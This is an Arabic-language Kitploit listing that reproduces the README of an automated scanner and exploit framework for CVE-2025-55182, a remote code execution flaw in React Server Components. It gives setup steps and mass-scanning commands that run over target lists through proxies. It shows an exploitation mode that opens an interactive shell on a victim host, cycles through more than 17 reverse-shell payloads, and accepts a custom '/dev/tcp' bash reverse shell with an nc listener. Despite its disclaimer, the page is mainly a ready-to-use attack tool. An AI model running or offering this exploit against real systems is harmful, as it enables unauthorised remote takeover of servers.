Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — ماسح ضعف RCE حرج لمكونات خادم React (CVE-2025-55182). إطار استغلال آلي مع دعم متعدد للحمولات، وقدرات الوكيل، وتنفيذ أوامر تفاعلي. | Kitploit
أدوات/GitHubGitHub/alihzsec/cve-2025-55182
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

ماسح ضعف RCE حرج لمكونات خادم React (CVE-2025-55182). إطار استغلال آلي مع دعم متعدد للحمولات، وقدرات الوكيل، وتنفيذ أوامر تفاعلي.

عرض المستودع
1513منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح ومستغل CVE-2025-55182

[!Warning] هذا المستودع مخصص لأغراض تعليمية وبحثية فقط.

  • استخدم أدوات الإثبات المقدمة حصريًا على أنظمتك أو التي لديك إذن صريح لاختبارها.
  • الوصول غير المصرح به أو الاستغلال أو سوء استخدام أي مادة في هذا المستودع غير قانوني.
  • المؤلف (المؤلفون) لا يتحملون أي مسؤولية عن أي أضرار أو سوء استخدام أو عواقب قانونية ناتجة عن الاستخدام غير الصحيح.

🔍 نظرة عامة

CVE-2025-55182 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد تؤثر على إصدارات React Server Components 19.0.0 و19.1.0 و19.1.1 و19.2.0. تنبع هذه الثغرة من إلغاء التسلسل غير الآمن لحمولات طلبات HTTP إلى نقاط نهاية وظائف الخادم، مما يسمح للمهاجمين غير الموثوقين بتنفيذ تعليمات برمجية عشوائية عن بُعد.


🐛 تفاصيل الثغرة الأمنية

معرف CVE: CVE-2025-55182
الإصدارات المتأثرة:

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 التثبيت

المتطلبات الأساسية

  • Python 3.8 أو أعلى
  • pip (مدير حزم Python)
  • الإعداد

    1. استنساخ المستودع
    root@kitploit:~
    git clone https://github.com/AliHzSec/CVE-2025-55182.git
    cd CVE-2025-55182
    
    1. إنشاء بيئة افتراضية (موصى به)
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    
    1. تثبيت التبعيات
    root@kitploit:~
    pip install -r requirements.txt
    

    📖 الاستخدام

    root@kitploit:~
    python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
    

    الوسائط

    الوسائط

    الوسيطةالوصف
    -d, --detectionتشغيل في وضع الكشف (مسح الثغرات)
    -e, --exploitتشغيل في وضع الاستغلال (استغلال هدف واحد)
    -u, --url URLعنوان URL لهدف واحد للمسح/الاستغلال
    -l, --list FILEملف يحتوي على قائمة عناوين URL الأهداف (وضع الكشف فقط)
    -p, --proxy URLعنوان URL وكيل واحد (مثال: http://127.0.0.1:8080)
    -pl, --proxy-list FILEملف يحتوي على قائمة عناوين URL للوكلاء (واحد لكل سطر)
    -t, --threads Nعدد الخيوط المتزامنة (الافتراضي: 10، وضع الكشف فقط)
    -s, --silentالوضع الصامت - عرض الأهداف الضعيفة فقط (وضع الكشف فقط)
    -o, --output [FILE]حفظ الأهداف الضعيفة في ملف (وضع الكشف فقط). إذا لم يتم تقديم اسم ملف، يستخدم الافتراضي: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
    --debugتمكين تسجيل التصحيح - عرض تفاصيل الاستجابة ومحاولات إعادة المحاولة (غير متاح في الوضع الصامت)

    🎯 وضع الكشف

    مسح هدف واحد

    root@kitploit:~
    python3 main.py -d -u https://example.com
    

    مسح أهداف متعددة من ملف

    root@kitploit:~
    python3 main.py -d -l targets.txt
    

    المسح باستخدام وكيل

    root@kitploit:~
    python3 main.py -d -l targets.txt -p http://127.0.0.1:8080
    

    الوضع الصامت (عرض الأهداف الضعيفة فقط)

    root@kitploit:~
    python3 main.py -d -l targets.txt -s
    

    المسح متعدد الخيوط

    root@kitploit:~
    python3 main.py -d -l targets.txt -t 20
    

    💣 وضع الاستغلال

    شل تفاعلي

    root@kitploit:~
    python3 main.py -e -u https://vulnerable-site.com
    

    ثم اختر [i] للشل التفاعلي:

    root@kitploit:~
    Choose exploitation method:
      [i] Interactive shell
      [r] Reverse shell
    
    Enter your choice (i/r): i
    
    shell> whoami
    ec2-user
    
    shell> id
    uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
    
    shell> ls -la
    total 48
    drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
    drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
    ...
    
    shell> exit
    

    شل عكسي

    root@kitploit:~
    python3 main.py -e -u https://vulnerable-site.com
    

    ثم اختر [r] للشل العكسي واختر نوع الحمولة:

    الخيار 1: الحمولات الافتراضية (موصى به)

    root@kitploit:~
    Choose exploitation method:
      [i] Interactive shell
      [r] Reverse shell
    
    Enter your choice (i/r): r
    
    Choose payload option:
      [d] Use default payloads (Try multiple reverse shells)
      [c] Provide custom payload
    
    Enter your choice (d/c): d
    
    Enter your IP and port in this format:
    Example: 192.168.1.100:4444
    
    IP:PORT> 192.168.1.100:4444
    
    Setup your listener with this command:
    nc -lvnp 4444
    
    Press ENTER when your listener is ready...
    

    ستحاول الأداة تلقائيًا أكثر من 17 حمولة شل عكسي مختلفة حتى تنجح إحداها.

    الخيار 2: حمولة مخصصة

    root@kitploit:~
    Enter your choice (d/c): c
    
    Enter your custom reverse shell payload:
    payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
    

    📚 المراجع

    • الإرشاد الأمني الرسمي لـ React
    • الإرشاد الأمني لـ Meta
    • الإرشاد الأمني لـ Vercel
    • الإرشاد الأمني لـ Next.js
    • تفاصيل CVE

    إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة! ⭐
    صنعت بـ ❤️ من أجل مجتمع الأمان
    تنزيل الأداة